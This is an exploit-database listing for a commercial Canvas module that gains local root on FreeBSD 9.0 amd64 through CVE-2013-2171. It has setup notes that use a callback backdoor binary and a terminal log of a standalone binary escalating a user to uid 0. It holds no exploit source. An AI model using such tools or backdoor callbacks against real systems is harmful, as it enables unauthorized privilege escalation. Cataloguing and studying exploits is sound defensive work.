History: Jul 02, 2013 - 3:43 a.m.

Immunity Canvas: MAPTRACE

2013-07-02 03:43:00
Immunity Canvas
exploitlist.immunityinc.com
EPSS: 0.003 (Low)
Percentile: 68.1%

Name: maptrace
CVE: CVE-2013-2171 Exploit Pack
VENDOR: Intel, FreeBSD
Notes:
Tested on FreeBSD 9.0-RC3 and FreeBSD 9.0-RELEASE* AMD64

To test this exploit from CANVAS, use the ./backdoors/mosdef_callbacks/mosdef_callback_fbsd9_i386
callback binary to establish a BSD node on a universal CANVAS listener. Then run the maptrace
module against this node to elevate your privileges on the node. This should work on FreeBSD
9.0-RELEASE* amd64 on 64-bit Intel processors. Note that this will not spawn a new node, but rather
keeps the existing node connection with elevated privileges.

Alternatively you can use the Resources/x binary outside of the framework.

$ uname -a
FreeBSD freebsd90 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64
$ id
uid=1001(immunity) gid=1001(immunity) groups=1001(immunity)
$ ./x
[] FeeBSD amd64 local r00t - MMAP/PTRACE []

id

uid=0(root) gid=0(wheel) groups=0(wheel)

Repeatability: Infinite
References: http://www.freebsd.org/security/advisories/FreeBSD-SA-13:06.mmap.asc
CVE Url: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2171